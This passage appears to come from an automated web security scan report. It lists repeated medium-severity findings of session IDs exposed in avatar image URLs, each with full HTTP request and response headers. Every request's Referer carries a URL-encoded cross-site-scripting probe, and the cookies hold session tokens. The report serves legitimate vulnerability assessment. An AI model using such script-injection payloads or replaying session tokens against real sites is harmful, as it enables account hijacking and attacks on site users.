User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 01 Apr 2010 11:40:04 GMT
Etag: "1288"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14112 t=1313158266056527
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Length: 5463

...[SNIP]...

3.16. https://www.x.com/people/alfrednutile/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/alfrednutile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/alfrednutile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7218 t=1313157137930962
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.17. https://www.x.com/people/appcode/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/appcode/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/appcode/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8301 t=1313157137177952
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.18. https://www.x.com/people/cariad/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/cariad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/cariad/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1586 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 20 Dec 2010 13:19:20 GMT
Etag: "1586"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10493 t=1313157143020874
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Length: 5665

...[SNIP]...

3.19. https://www.x.com/people/christiancrest/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/christiancrest/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/christiancrest/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=17931 t=1313157136902220
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.20. https://www.x.com/people/ezimerchant/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/ezimerchant/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/ezimerchant/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1002 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1002"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8013 t=1313158264449114
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Length: 2278

...[SNIP]...

3.21. https://www.x.com/people/inhouse/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/inhouse/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/inhouse/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7776 t=1313157137338389
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.22. https://www.x.com/people/jameshill/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/jameshill/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/jameshill/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9191 t=1313157143974814
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.23. https://www.x.com/people/judemichael2001/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/judemichael2001/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/judemichael2001/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8739 t=1313157143045447
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.24. https://www.x.com/people/lilbugclothing/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lilbugclothing/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lilbugclothing/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11198 t=1313157143075751
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.25. https://www.x.com/people/lovelycar8888/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lovelycar8888/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lovelycar8888/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8650 t=1313157143024166
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.26. https://www.x.com/people/lurobertson/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lurobertson/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lurobertson/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7867 t=1313157143023151
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.27. https://www.x.com/people/mbtmobile/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mbtmobile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mbtmobile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10785 t=1313157144017520
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.28. https://www.x.com/people/michaelcaplan/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/michaelcaplan/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/michaelcaplan/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=12230 t=1313157143974612
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.29. https://www.x.com/people/mikertjones/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mikertjones/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mikertjones/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9603 t=1313157137187386
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.30. https://www.x.com/people/moneygun/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/moneygun/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/moneygun/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1013 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1013"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7141 t=1313157136784012
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 2959

...[SNIP]...

3.31. https://www.x.com/people/pdumas/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/pdumas/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/pdumas/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7093 t=1313157137047579
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.32. https://www.x.com/people/structuralartistry/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/structuralartistry/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

